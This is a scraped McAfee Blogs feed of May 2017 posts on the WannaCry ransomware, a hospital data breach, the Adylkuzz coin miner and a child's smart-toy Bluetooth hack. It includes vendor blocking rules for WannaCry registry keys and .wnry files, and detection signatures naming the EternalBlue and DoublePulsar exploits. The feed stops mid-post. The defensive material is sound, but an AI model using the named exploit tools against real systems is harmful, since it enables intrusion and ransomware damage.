Sixth-grader weaponizes smart teddy bear, hacks security audience’s Bluetooth https://securingtomorrow.mcafee.com/business/neutralize-threats/sixth-grader-weaponizes-smart-teddy-bear-hacks-security-audiences-bluetooth/ Mon, 22 May 2017 17:10:57 +0000 https://securingtomorrow.mcafee.com/?p=74332 If yet another cybersecurity expert wanted to warn the general public about the risks associated with the Internet of Things (IoT), it is likely the warning would go in one ear and out the other. But when a sixth-grader hacks an audience of security experts and “weaponizes” his smart teddy bear, it might just snag …

The post Sixth-grader weaponizes smart teddy bear, hacks security audience’s Bluetooth appeared first on McAfee Blogs.

]]>
If yet another cybersecurity expert wanted to warn the general public about the risks associated with the Internet of Things (IoT), it is likely the warning would go in one ear and out the other. But when a sixth-grader hacks an audience of security experts and “weaponizes” his smart teddy bear, it might just snag the attention of parents who have disregarded warnings about the dangers and bought internet-connected toys for their kids anyway.

At the International One Conference in the Netherlands on May 16, 11-year-old Reuben Paul set out to ensure that “the Internet of Things does not end up becoming the Internet of Threats.” Judging by security experts’ awed reactions on Twitter, Paul made a lasting impression.

“From airplanes to automobiles, from smart phones to smart homes, anything or any toy can be part of the Internet of Things (IoT),” Paul said during his keynote, Mutually Symb-IoT-ic Security. On stage at the World Forum in The Hague, he added, “From terminators to teddy bears, anything or any toy can be weaponized.”

He then used his smart teddy bear, Bob, to prove his point. Paul plugged a Raspberry Pi into the bear, which is connected to the cloud via Wi-Fi and Bluetooth, to send and receive messages. He scanned for Bluetooth devices. AFP reported that “to everyone’s amazement, including his own,” he “suddenly downloaded dozens of numbers including some of the top officials.”

Using Python, he “hacked into this bear via one of the numbers to turn on one of its (LED) lights and record a message from the audience.”

Live demos are great when they work as intended, but it surely is nerve-wracking for the speaker.

 

Young Paul, aka @RAPst4r, tweeted that his “heart was going boom boom before the bear’s heart went blink blink.”

 

“Most internet-connected things have a Bluetooth functionality. … I basically showed how I could connect to it, and send commands to it, by recording audio and playing the light,” Paul told AFP.

“IoT home appliances, things that can be used in our everyday lives, our cars, lights, refrigerators, everything like this that is connected in our homes, could be used and weaponized to spy on us, or even harm us,” he added.

Internet-connected devices can be weaponized to steal passwords or other sensitive information, used as remote surveillance or to determine a person’s location. A smart toy could be abused to tell a kid, “Meet me at this location and I will pick you up.”

His Kung Fu is strong and not just the digital kind. Paul was the youngest person in America to have received the Shaolin Do Kung Fu Black Belt.

This Austin, Texas, sixth-grade “cyber ninja” is also founder and CEO of CyberShaolin, a non-profit organization with a mission “to educate, equip and empower kids with the knowledge of cybersecurity dangers and defenses, using videos and games.” These are videos and games that Paul “develops when he is done with his homework or his sports training.”

Paul has shown an aptitude in IT since he was six. He “shocked” his dad, IT expert Mano Paul, by first hacking a toy car before moving on to exploit vulnerabilities in more complex toys. His father said, “It means that my kids are playing with time-bombs that over time somebody who is bad or malicious can exploit.”

This isn’t the first time his son has presented at security conferences. In 2014, at age 8, Paul delivered a talk at DerbyCon. And when he was only a third-grader, Paul gave a closing keynote at the 2014 Houston Security Conference and spoke at the (ISC)2 Congress. Back then, he reportedly wanted to become a cyber spy and had already become founder and CEO of Prudent Games. At age 9, he was dubbed the next generation of security at the RSA conference and a child prodigy.

It’s exciting to think what he might do next after live-hacking his smart teddy bear. Be it his age or hacking a toy, Paul hopes people won’t miss the message:

 

 

This article was written by Ms. Smith from NetworkWorld and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

The post Sixth-grader weaponizes smart teddy bear, hacks security audience’s Bluetooth appeared first on McAfee Blogs.

]]>
Over 7,000 Patients’ Data Compromised in Bronx Lebanon Hospital Data Breach https://securingtomorrow.mcafee.com/business/7000-patients-data-compromised-bronx-lebanon-hospital-data-breach/ https://securingtomorrow.mcafee.com/business/7000-patients-data-compromised-bronx-lebanon-hospital-data-breach/#respond Fri, 19 May 2017 16:30:01 +0000 https://securingtomorrow.mcafee.com/?p=74314 While all of us were focusing on the massive WannaCry ransomware attack that hit more than 150 countries last Friday, other breaches managed to fly under the radar, including one large data breach that impacted the Bronx Lebanon Hospital Center in New York City. The breach exposed the records of over 7,000 patients. What kind …

The post Over 7,000 Patients’ Data Compromised in Bronx Lebanon Hospital Data Breach appeared first on McAfee Blogs.

]]>
While all of us were focusing on the massive WannaCry ransomware attack that hit more than 150 countries last Friday, other breaches managed to fly under the radar, including one large data breach that impacted the Bronx Lebanon Hospital Center in New York City. The breach exposed the records of over 7,000 patients.

What kind of medical records were compromised? Unfortunately, a lot. Specifically, patients’ mental health and medical diagnoses, HIV statuses, sexual assault and domestic violence reports, as well as names, home addresses, and social security numbers. The actual length of time these records were left exposed is not known, but it seems that anyone who was a patient at the hospital between 2014 and 2017 is potentially at risk.

How did this breach happen? Some sources believe a misconfigured Rsync backup server hosted by the third-party records management vendor iHealth Solutions was left susceptible. This instance is indicative of a larger trend in the industry where institutions move to adopt new technology architectures, yet don’t take steps to protect the legacy systems that they transitioned from. Turning off access to that system does not equal a secure system, especially when it’s still connected on the network and not patched and maintained in the same way it used to be.

Here are a few takeaways to remember when building a security strategy and preventing future attacks:

1.     Make data flows a priority.

The identification of those not only allows you to identify information about what data is involved and touched by whom (which can help with your Data Loss Protection and Identity Management initiatives). It also gives you visibility on what systems talk to each other in what way. That is critical to know when architecting a security solution as the initial vector of the attack and the final malware that exfiltrates data or impacts workflow don’t often share the same technology protocols or application stacks.

2.     Have a response strategy that involves your emergency management and risk group.

The former will aide in containing and recovering clinical and operational impact due to the incident, while the latter is the conduit to your cyber liability insurance policy who will be one the resources to provide services like incident response, call center management, law suit protections, etc.

3.     Advise patients to get insurance providers involved.

While credit monitoring is helpful in response to a medical data theft scenario, it is good practice for impacted patients to follow up with their insurance providers, who can provide claim processing information to make sure patients are not victims of medical fraud. Additionally, prompt patients to update their passwords for patient portals with doctors, hospitals, and insurance companies.

To gain further insight on how to protect yourself from breaches like this and to stay up-to-date on all cybersecurity news, make sure to follow @McAfee and @McAfee_Business.

The post Over 7,000 Patients’ Data Compromised in Bronx Lebanon Hospital Data Breach appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/7000-patients-data-compromised-bronx-lebanon-hospital-data-breach/feed/ 0
The Week That Was In Internet History https://securingtomorrow.mcafee.com/consumer/family-safety/week-internet-history/ https://securingtomorrow.mcafee.com/consumer/family-safety/week-internet-history/#respond Thu, 18 May 2017 18:02:33 +0000 https://securingtomorrow.mcafee.com/?p=74297 From the wheel to the internet, we have come a long way in terms of technological progress. While the invention of the wheel set human progress in motion, the industrial revolution with its assembly line production gave it a boost and now the information revolution has catapulted us to the digital age. This week we …

The post The Week That Was In Internet History appeared first on McAfee Blogs.

]]>
From the wheel to the internet, we have come a long way in terms of technological progress. While the invention of the wheel set human progress in motion, the industrial revolution with its assembly line production gave it a boost and now the information revolution has catapulted us to the digital age.

This week we observed Internet Day on May 17. Internet Day, aims to show the possibilities offered by new technologies to improve the standard of living of people by giving them more understanding of technology and its functions. Ironically, we also saw one of the most prolific ransomware attacks in history with ‘WannaCry’.

While the digital revolution has disrupted industries and eased the way we live, work and think, it has also led to loss in the form of identity theft, malware and the topic of discussion i.e. ransomware. Today, innumerable companies collect information about us, the consumer, for their research and are susceptible to breaches.

As Spiderman says (Peter Parker to you), “With great power comes great responsibility.” Cliché, I know, but true at a time like this. In a day where big data is instrumental in winning opinions, it is necessary that each one of us know how to use technology safely and responsibly. Data privacy and cybersecurity form the core pillar of the privilege of technology, and so let us refresh our understanding of internet security. In order to stay prepared and keep your personal data secure, follow these tips:

  1. Back up your files:Always make sure your files are backed up. That way, if they become compromised in a ransomware attack, you can wipe your disk drive clean and restore the data from the backup.
  2. Update your devices:There are a few lessons to take away from WannaCry, but making sure your operating system is up-to-date needs to be near the top of the list. The reason is simple: nearly every software update contains security improvements that help secure your computer and removes the means for ransomware variants to infect a device.
  3. Schedule automatic updates.It’s always a good practice to set your home systems to apply critical Windows Security Updates automatically. That way, whenever there is a vulnerability, you receive the patch immediately.
  4. Apply any Windows security patches that Microsoft has sent you. If you are using an older version of Microsoft’s operating systems, such as Windows XP or Windows 8, click hereto download emergency security patches from Microsoft.

The recent WannaCry attack is perhaps one of the largest and most widespread ransomware attack in recent history, with India being a prime target. The most affected were those, who were running old and unpatched software, which threatens more than just data of the consumers. While there is no silver bullet to security, this attack does serve as a reminder for consumers to prepare for ransomware attacks.

Stay safe. Together is Power!

The post The Week That Was In Internet History appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/week-internet-history/feed/ 0
WannaCry: When the Theoretical Becomes Real https://securingtomorrow.mcafee.com/business/wannacry-theoretical-becomes-real/ https://securingtomorrow.mcafee.com/business/wannacry-theoretical-becomes-real/#respond Thu, 18 May 2017 01:05:23 +0000 https://securingtomorrow.mcafee.com/?p=74244 I’ve spent many years talking to audiences – corporate customers, government leaders, and everyday people – about cyberthreats both real and possible. But what happened over last weekend with the “WannaCry” threat feels like a point at which “future threats” become “now threats” in many people’s minds. We’ve all known for decades about hackers, information …

The post WannaCry: When the Theoretical Becomes Real appeared first on McAfee Blogs.

]]>
I’ve spent many years talking to audiences – corporate customers, government leaders, and everyday people – about cyberthreats both real and possible. But what happened over last weekend with the “WannaCry” threat feels like a point at which “future threats” become “now threats” in many people’s minds.

We’ve all known for decades about hackers, information thefts, computer viruses etc. But when a hospital’s information systems get locked, and lives are at stake, think pieces about the “Future of Cybersecurity” don’t seem so distant. The future is now.

The on-going WannaCry attack, which started last Friday, is the first time we’ve seen worm tactics combined with ransomware on major scale. The outbreak has already infected 350,000 victims in more than 150 countries.

WannaCry’s success comes down to its ability to amplify one attack through the vulnerabilities of many machines on the network, making the impact greater than what we’ve seen from traditional ransomware attacks. (See Steve Grobman’s blog on the intricacies of the attack here).

We are protecting you, at Day Zero and beyond

McAfee technology provided Day Zero protection against the WannaCry attack, not just at the endpoint but across many aspects of an integrated security architecture.  More than ever, threats like WannaCry remind us that an integrated defense is the best defense because it enables you to protect, detect and respond to the newest and most challenging threats:

  • McAfee Endpoint Security (ENS) 10.2 (or later) running Dynamic Application Containment (DAC) in Secure mode gave full Day Zero protection against WannaCry.
  • ENS, Threat Intelligence Exchange (TIE) and Advanced Threat Defense (ATD) operate together as a zero touch, closed loop security defense system. This system provided effective prevention, detection and response of the attacks at Day Zero as ATD identified the attacks as malicious, allowing the McAfee integrated defense architecture to automatically update defenses across the remaining environment.
  • McAfee Active Response (MAR) delivered trace data that revealed malicious activity at Day Zero, helping responders identify the attack and update defenses across the environment.
  • McAfee Network Security Platform: our IPS used its Signatureless and protocol anomaly engine to detect the backdoor planted on compromised machines, and has updated signatures to protect against the SMB RCE attacks as well as the Eternal* tools.

For customers on older endpoint technology, McAfee researchers analyzed samples of the ransomware immediately upon detection then updated McAfee Global Threat Intelligence (GTI) and released an emergency DAT and new HIPS signatures for extra coverage.  I strongly encourage all our customers to join the millions of end users who have already upgraded to McAfee Endpoint Security v10.5 to enjoy the advanced technology and zero-day protection capabilities it provides.

The Big Picture

Though there is an immediate threat to be met, it’s important to keep an eye on the Big Picture. Now, more than ever, the “new threat, new widget” approach must evolve. It’s not sustainable to continue frantically filling cracks in a foundation that is sinking; we must begin building the proper foundation to begin with.

McAfee’s belief is that an effective defense is built on a dynamic cybersecurity platform that is both open and integrated. Open, so it can quickly accept new technologies that protect against even the most creative adversaries; and integrated in that technologies work together as a cohesive defense.

Those integrated defenses were on clear display in protecting our customers during this worldwide episode.  Leveraging an automated security system that protects, detects and corrects in real time allows users to both free up resources and thwart advanced attacks.  An integrated endpoint platform ensures that people have both the latest technologies today and the ability to add the newest technology year after year.  As a result, users no longer have to choose between the best technology and the most manageable – they can have both.

Together is power.

 

To read more about how McAfee products protect against WannaCry, read How to Protect Against WannaCry Ransomware in a McAfee Environment.”

 

The post WannaCry: When the Theoretical Becomes Real appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/wannacry-theoretical-becomes-real/feed/ 0
How to Protect Against WannaCry Ransomware in a McAfee Environment https://securingtomorrow.mcafee.com/mcafee-labs/protect-wannacry-ransomware-mcafee-environment/ https://securingtomorrow.mcafee.com/mcafee-labs/protect-wannacry-ransomware-mcafee-environment/#respond Thu, 18 May 2017 00:37:23 +0000 https://securingtomorrow.mcafee.com/?p=74124 WannaCry is a ransomware family targeting Microsoft Windows. On Friday May 12, a large cyberattack based on this threat was launched. At this time, it is estimated that more than 250,000 computers in 150 countries have been infected, each demanding a ransom payment.

The post How to Protect Against WannaCry Ransomware in a McAfee Environment appeared first on McAfee Blogs.

]]>
This post was updated on May 31 with links to three McAfee community videos concerning WannaCry ransomware. 

WannaCry Ransomware – McAfee ATP: Highlighting the value of Adaptive Threat Protection
WannaCry Ransomware – DAC/ATD: Highlighting the value of malware analytics
WannaCry Ransomware – McAfee MAR: Highlighting the value of Cloud Threat Analytics

 

WannaCry is a ransomware family targeting Microsoft Windows. On Friday May 12, a large cyberattack based on this threat was launched. At this time, it is estimated that more than 250,000 computers in 150 countries have been infected, each demanding a ransom payment.

The initial attack vector is unclear, but an aggressive worm helps spread the ransomware. A critical patch was released by Microsoft on March 14 to remove the underlying vulnerability in supported versions of Windows, but many organizations have not yet applied this patch.

Computers running unsupported versions of Windows (Windows XP, Windows Server 2003) did not have an available patch, but Microsoft released a security patch for Windows XP and Windows Serve 2003 over the weekend.

Detailed technical analyses of the WannaCry ransomware can be found here (posted May 12) and here (May 14).

 

How McAfee products can protect against WannaCry ransomware

McAfee is leading the way enterprises protect against emerging threats such as WannaCry ransomware, remediate complex security issues, and combat attacks with an intelligent end-to-end security platform that provides adaptable and continuous protection as a part of the threat defense lifecycle.

McAfee had zero-day protection for components of the initial WannaCry attack in the form of behavioral, heuristic, application control, and sandbox analyses. This post provides an overview of those protections with the following products:

  • McAfee Network Security Platform (NSP)
  • McAfee Host Intrusion Prevention (HIPS)
  • McAfee Endpoint Protection (ENS)
  • McAfee VirusScan Enterprise (VSE)
  • McAfee Advanced Threat Defense (ATD)
  • McAfee Web Gateway (MWG)
  • McAfee Threat Intelligence Exchange (TIE)

Frequently updated technical details can be found in the McAfee Knowledge Center article KB89335.

 

McAfee Network Security Platform (NSP)

McAfee NSP is one product that quickly responds to prevent exploits and protect assets within networks. The McAfee NSP team works diligently to develop and deploy user-defined signatures (UDS) for critical matters. Within a 24-hour period, several UDS were created and uploaded for customers to deploy on their network sensors. In this case, the UDS explicitly targeted the exploit tools EternalBlue, Eternal Romance SMB Remote Code Execution, and DoublePulsar. There were also related indicators of compromise that were released which could be added to a blacklist to block potential threats associated with the original Trojan.

NSP signatures:

  • 0x43c0b800—NETBIOS-SS: Windows SMBv1 identical MID and FID type confusion vulnerability (CVE-2017-0143)
  • 0x43c0b400—NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144)
  • 0x43c0b500—NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0145)
  • 0x43c0b300—NETBIOS-SS: Microsoft Windows SMB Out of Bounds Write Vulnerability (CVE-2017-0146)
  • 0x43c0b900—NETBIOS-SS: Windows SMBv1 Information Disclosure Vulnerability (CVE-2017-0147)

The NSP Research Team has reviewed the information for CVE-2017-0148 and has created the following UDS:

  • NETBIOS-SS: MS17-010 EternalBlue SMB Remote Code Execution
  • NETBIOS-SS: SMB DoublePulsar Unimplemented Trans2 Session Setup Subcommand Request
  • HTTP: Windows Kernel Information Disclosure Vulnerability (CVE-2017-0175)
  • HTTP: Microsoft Windows Edge IE Mixed Content Warnings Bypass Vulnerability (CVE-2017-0064)
  • HTTP: Microsoft Scripting Engine Memory Corruption Vulnerability (CVE-2017-0234)
  • HTTP: Microsoft Scripting Engine Memory Corruption Vulnerability (CVE-2017-0236)

The UDS is available from KB55447 only for registered users. Log in to https://support.mcafee.com to access the article.

 

McAfee Host Intrusion Prevention (HIPS)

McAfee HIPS 8.0 with NIPS Signature 6095 (which will be released on May 16), provides protection against all four of the preceding known variants of WannaCry.

For the interim period, HIPS custom signatures can be created to protect against the encryption of files. Refer to KB89335 for the latest information on these configurations.

Custom Sig #1: WannaCry Registry Blocking Rule

Use Standard Subrule

Rule Type = Registry

Operations = Create, Modify, Change Permissions

Parameters, include Registry Key

Registry Key =  \REGISTRY\MACHINE\SOFTWARE\WanaCrypt0r

Executable = *

Custom Sig #2: WannaCry File/Folder Blocking Rule

Use Standard Subrule

Rule Type = Files

Operations = Create, Write, Rename, Change read-only/hidden attributes,

Parameters, include Files

Files = *.wnry

Executable = *

 

McAfee Endpoint Protection (ENS) and McAfee VirusScan Enterprise (VSE)

McAfee recommends the following Adaptive Threat Protection configurations to protect against the WannaCry exploit and unknown variants.

 

McAfee Endpoint Security 10.5—Adaptive Threat Protection

McAfee Endpoint Security 10.5 with Adaptive Threat Protection Real Protect & Dynamic Application Containment (DAC) provides protection against known or unknown exploits for WannaCry.

  1. Configure the following setting in the Adaptive Threat Protection—Options Policy:

Rule Assignment = Security (default setting is balanced)

  1. Configure the following rules in the Adaptive Threat Protection—Dynamic Application Containment policy:

Dynamic Application Containment—Containment Rules

(Refer to KB87843–Best Practices for ENS Dynamic Application Containment Rules and set the recommended DAC rules to “Block” as prescribed.)

 

Content Dependent Security Products

McAfee Endpoint Security 10.1, 10.2, and 10.5—Threat Prevention

McAfee Endpoint Security 10.x Threat Prevention with AMCore content Version 2978 or later provides protection against all four of the preceding currently known variants of WannaCry.

 

McAfee VirusScan Enterprise 8.8

McAfee VirusScan Enterprise 8.8 with DAT content 8527 or later provides protection against all four of the preceding currently known variants of WannaCry.

 

McAfee Endpoint Protection (ENS) and McAfee VirusScan Enterprise (VSE) Access Protection proactive measures

The McAfee ENS and McAfee VSE Access Protection rules will prevent the creation of the .wnry file. This rule prevents the encryption routine, which creates encrypted files that contain a .wncryt, .wncry, or .wcry extension. By implementing the block against .wnry files, other blocks are not necessary for the encrypted file types.

Use McAfee VSE Access Protection rules:

Rule1:

Rule Type: Registry Blocking Rule
Process to include: *
Registry key or value to protect: HKLM—/Software/WanaCrypt0r
Registry key or value p protect: Key
File actions to prevent: Create key or value.

Rule2:

Rule Type: File/Folder Blocking Rule
Process to include: *
File or folder name to block: *.wnry
File actions to prevent: New files being created

Use McAfee ENS Access Protection rules:

Rule1:

Executable1:

Inclusion: Include
File Name or Path: *

SubRule1:

SubRule Type: Registry key
Operations: Create
Target1:

Inclusion: Include
File, folder name, or file path: *\Software\WanaCrypt0r

SubRule2:

SubRule Type: Files
Operations: Create
Target1:

Inclusion: Include
File, folder name, or file path: *.wnry

McAfee ENS Dynamic Application Containment rules triggered by Ransom-WannaCry variants:

Rule1:

Rule Name: Executing any child process

Rule2:

Rule Name: Accessing user cookie locations

Rule3:

Rule Name: Creating files with the .html, .jpg, or .bmp extension

Rule4:

Rule Name: Creating files with the .exe extension

Rule5:

Rule Name: Modifying users’ data folders

Rule6:

Rule Name: Modifying startup registry locations

Rule7:

Rule Name: Modifying critical Windows files and registry locations

Rule8:

Rule Name: Reading or modifying files on any network location

Rule9:

Rule Name: Modifying files with the .bat extension

Rule10:

Rule Name: Modifying files with the .vbs extension

Rule11:

Rule Name: Creating files with the .bat extension

Rule12:

Rule Name: Reading files commonly targeted by ransomware-class malware

Rule13:

Rule Name: Creating files on any network location

Rule14:

Rule Name: Writing to files commonly targeted by ransomware-class malware

Rule15:

Rule Name: Modifying the hidden attribute bit

 

Configure your endpoint security system to protect against file encryption from WannaCry (and future unknown variants)

Customers not using McAfee ENS Adaptive Threat Protection security may not have McAfee-defined content protection against not yet released variants. We recommend configuring repository update tasks with a minimal refresh interval to ensure new content is applied when it is released by McAfee.

Additional protections against the encryption routine can be configured using McAfee VSE/ENS Access Protection rules, or McAfee HIPS custom rules. Refer to KB89335 for the latest information on these configurations.

McAfee VSE and McAfee ENS Access Protection rules, and McAfee HIPS customer signature will prevent the creation of the .wnry file.

The rules prevent the encryption routine, which creates encrypted files that contain a .wncryt, .wncry, or .wcry extension.

By implementing the block against .wnry, other blocks are not necessary for the encrypted file types.

Refer to KB89335 (accessible to McAfee registered customers) for the latest information on these configurations.

 

McAfee Advanced Threat Defense (ATD)

McAfee ATD machine learning can convict a sample on a “medium severity” analysis.

McAfee ATD has observed the following:

Behavior classification:

  • Obfuscated file
  • Spreading
  • Exploitation through shellcode
  • Network propagation

Dynamic analysis:

  • Elicited ransomware behavior
  • Encryption of files
  • Created and executed suspicious scripting content
  • Behaved like a Trojan macro dropper

McAfee ATD observed 22 process operations, including five runtime DLLs, 58 file operations, registry modifications, file modifications, file creations (dll.exe), DLL injections, and 34 network operations.

Further analysis continues on other variants. McAfee is identifying what other behaviors can be extracted to detect future attacks.

 

McAfee Web Gateway (MWG)

McAfee Web Gateway (MWG) is a product family (appliance, cloud, and hybrid) of web proxies that provides immediate protection against WannaCry variants delivered through the web (HTTP/HTTPS) using multiple real-time scanning engines.

Known variants will be blocked by McAfee Global Threat Intelligence (GTI) reputation and antimalware scanning as web traffic is processed through the proxy.

The Gateway Anti-Malware (GAM) engine within MWG provides effective prevention of variants that have not yet been identified with a signature (“zero-day” threats) through its process of behavior emulation, conducted on files, HTML, and JavaScript. Emulators are regularly fed intelligence by machine learning models. GAM runs alongside GTI reputation and antimalware scanning as traffic is processed.

Coupling MWG with ATD allows for further inspection and an effective prevention and detection approach.

 

McAfee Threat Intelligence Exchange (TIE)

McAfee Threat Intelligence Exchange (TIE) further enhances a customer’s security posture. With the ability to aggregate reputation verdicts from ENS, VSE, MWG, and NSP, TIE can quickly share reputation information related to WannaCry with any integrated vector. By providing the ability to use GTI for a global reputation query, TIE also enables integrated products to make an immediate decision prior to execution of the ransomware payload, leveraging the reputation cached in the TIE database.

As one endpoint protects, detects from any related variants, and updates the reputation score to TIE, this fully encompassing approach extends protection to endpoints by disseminating this information to all endpoints integrated with TIE. This bidirectional sharing of threat intelligence is duplicated in capability with MWG and NSP. Thus, as the potential threat attempts to infiltrate through the network or web, MWG and NSP will provide protection and detection and share this intelligence with TIE to inoculate endpoints—immediately protecting the enterprise with no further execution of the convicted variant on a potential “patient zero” in the environment.

 

 

 

The post How to Protect Against WannaCry Ransomware in a McAfee Environment appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/protect-wannacry-ransomware-mcafee-environment/feed/ 0
Adylkuzz CoinMiner Spreading Like WannaCry https://securingtomorrow.mcafee.com/mcafee-labs/adylkuzz-coinminer-spreading-like-wannacry/ https://securingtomorrow.mcafee.com/mcafee-labs/adylkuzz-coinminer-spreading-like-wannacry/#respond Wed, 17 May 2017 22:40:28 +0000 https://securingtomorrow.mcafee.com/?p=74265 The last few days have been very busy for security teams all around the globe due to the nasty ransomware WannaCry, which spread widely using an exploit for a Server Message Block v1 vulnerability (MS17-010) leaked by the ShadowBroker team a few weeks ago. We have reported on this malware in our previous blog and …

The post Adylkuzz CoinMiner Spreading Like WannaCry appeared first on McAfee Blogs.

]]>
The last few days have been very busy for security teams all around the globe due to the nasty ransomware WannaCry, which spread widely using an exploit for a Server Message Block v1 vulnerability (MS17-010) leaked by the ShadowBroker team a few weeks ago. We have reported on this malware in our previous blog and in a few others by our fellow McAfee researchers.

Today we learned that another malware family is using the same exploit to spread itself to vulnerable machines. The malware Adylkuzz is a CoinMiner malware, which means that it employs—without user consent—machine resources to mine coins for virtual currencies. This specific variant was used to mine Monero coins.

This CoinMiner is not a new variant. We have seen samples as old as October 2014, but it has increased in usage since April. Online reports mention that this malware have infected machines after a successful exploitation of the MS17-010 vulnerability followed by the installation of the backdoor malware EternalBlue/DoublePulsar.

Adylkuzz has not changed much in all these years, as we can see by comparing the code among the different waves. For example, the following graphs represent code differences between the October 2014 variant and the first wave starting in April this year:

The number of functions that changed was very small:

  • Identical functions: 1,553
  • Matched functions: 18
  • Unmatched functions: 167

The same can be seen between the April variant and the latest samples received:

  • Identical functions: 1,617
  • Matched functions: 0
  • Unmatched functions: 178

Because the malware has not changed and does not contain any code to exploit the SMB v1 vulnerability, we believe that some actor is leveraging the vulnerability by scanning remote hosts using a tool such as Metasploit and installing the CoinMiner malware via the DoublePulsar backdoor. A porting of the MS17-010 exploit is already available for Metasploit.

As this is old malware, McAfee has long had detection for it. We detect most of the samples as Packed-GV!<partial_md5> and Raiden detection RDN/Generic.grp.

Customers might also want to follow the generic guidelines for blocking, whenever possible, the network ports used by the exploit (TCP/445 and UDP/137) to avoid further infections.

We will update our readers about this malware as we learn more.

The post Adylkuzz CoinMiner Spreading Like WannaCry appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/adylkuzz-coinminer-spreading-like-wannacry/feed/ 0
How a Young Cybersecurity Researcher Stopped WannaCry Ransomware in Its Tracks https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybersecurity-researcher-stopped-wannacry-ransomware/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybersecurity-researcher-stopped-wannacry-ransomware/#respond Wed, 17 May 2017 16:05:14 +0000 https://securingtomorrow.mcafee.com/?p=74233 Last Friday, the biggest ransomware attack we’ve seen hit organizations everywhere, impacting more than 150 countries. It shut down a good chunk of Britain’s National Health Service, has earned the attackers $55,000 in bitcoin, and unfortunately, might not be done just yet. However, there’s good news—“WannaCry” is in fact slowing down, and the chance of …

The post How a Young Cybersecurity Researcher Stopped WannaCry Ransomware in Its Tracks appeared first on McAfee Blogs.

]]>
Last Friday, the biggest ransomware attack we’ve seen hit organizations everywhere, impacting more than 150 countries. It shut down a good chunk of Britain’s National Health Service, has earned the attackers $55,000 in bitcoin, and unfortunately, might not be done just yet. However, there’s good news—“WannaCry” is in fact slowing down, and the chance of more machines becoming infected has been seriously reduced. You can thank one 22-year-old British cybersecurity researcher for that, who used his self-assembled IT hub to locate the ransomware’s “kill switch.”

So, what exactly is this “kill switch” and how did he find it? First, the researcher got a sample of the WannaCry malware from a friend. Using his IT hub, which consists of computer servers, three monitors, and video games, he analyzed the sample and found a vulnerability, or, the “kill switch.” Basically, he realized the attack was referencing an unregistered domain, which is a URL at which there isn’t a website.  So, the researcher proceeded to register the domain, and essentially prevented the ransomware from spreading to any new computers from then on out. Best of all, this was all done from the comfort of his parents’ home.

This researcher’s story provides us with two reminders. The first being the importance of taking security into your own hands, and how one person can make an impact on security from their home. The second: ransomware, even the worst kinds, can be tackled.

However, to truly take down ransomware, you’ve got to be prepared for it. And even though WannaCry isn’t directly after consumers, ransomware is still a reality consumers have to face, as its continuing to grow both in impact and frequency. In fact, the threat has seen a consistent increase throughout the past few years, as the number of ransomware incidents increased to 229 in 2016 from 159 in 2015.

So, for users at home looking to learn how they can fight back, here are a few tips on what to do if a personal ransomware attack ever comes your way:

-Always make sure your devices are backed up. Though ransomware locks your files and demands compensation to give them back, you can avoid paying the ransom if that data is also stored elsewhere. By regularly backing up your devices, you can recover your information if ransomware does strike one day.

-Update everything. Both your operating system and the security program that protects it should always be as up-to-date as possible. New security patches are included with each update, so whenever there’s an update available, take action immediately. And to streamline the process, you can even set up automatic updates so that all software updates itself immediately.

-Don’t pay the ransom. Unless accessing your data is a matter of life or death, don’t give into cybercriminals’ wishes and pay the ransom. There’s no way to be sure that you will be given the decryption keys by the criminals who locked your device. Instead, consider removal tools, and reach out to your cybersecurity company for help.

-Cover your devices with comprehensive security. To protect your phone, computer, and all other personal devices from infection, cover them with an extra layer security and use a comprehensive security solution like McAfee LiveSafe.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post How a Young Cybersecurity Researcher Stopped WannaCry Ransomware in Its Tracks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/cybersecurity-researcher-stopped-wannacry-ransomware/feed/ 0
What WannaCry Means for the SOC https://securingtomorrow.mcafee.com/business/optimize-operations/what_wannacry_means_soc/ https://securingtomorrow.mcafee.com/business/optimize-operations/what_wannacry_means_soc/#respond Wed, 17 May 2017 15:38:39 +0000 https://securingtomorrow.mcafee.com/?p=74215 In addition to the endpoint and network operational efforts for WannaCry, this outbreak presents great learning and response opportunities for analysts in the security operations center (SOC). Understanding and automating these best practices will set you up to handle evolving WannaCry activities, as well as the next fast-moving attack. Responding to an attack like WannaCry, …

The post What WannaCry Means for the SOC appeared first on McAfee Blogs.

]]>
In addition to the endpoint and network operational efforts for WannaCry, this outbreak presents great learning and response opportunities for analysts in the security operations center (SOC). Understanding and automating these best practices will set you up to handle evolving WannaCry activities, as well as the next fast-moving attack.

Responding to an attack like WannaCry, the SOC must answer three key questions:

1. First Question – Am I affected?

The first process for a SOC is to assess what you have already experienced and gain current situational awareness. This evaluation can come from reports on endpoint and network security events related to the attack, from within the malware, and from the SIEM. In the McAfee ecosystem, here is what you can do:

  1. Report on Endpoint events. McAfee ePolicy Orchestrator can report out events based on the signatures it has downloaded from McAfee Global Threat Intelligence.
  2. Conduct Malware analysis. Sandboxing systems like McAfee Advanced Threat Defense can generate reports on unknown variants and share in machine-readable form as a STIX file.
  3. Perform Automated searching. Leveraging integrations provided by McAfee, IOC data from sandboxes and other sources can be used to immediately mine endpoints (via McAfee Active Response) and the SIEM database (via McAfee Enterprise Security Manager) for related activity. If an event containing an IOC is present in the SIEM database, it can indicate other hosts that are in the process of being locked, hosts connecting to malicious IP addresses or domains related to WannaCry, and related indicators that your own hunters may want to pursue as part of their containment efforts.
  4. Perform Manual IOC searches. Other sources of intelligence, such as external CERT notices, can also be used for ad hoc searching using McAfee Active Response.
Multi-engine analysis by McAfee Advanced Threat Defense shows the scope of malicious behavior in a WannaCry

2. Second Question – Is there new activity?

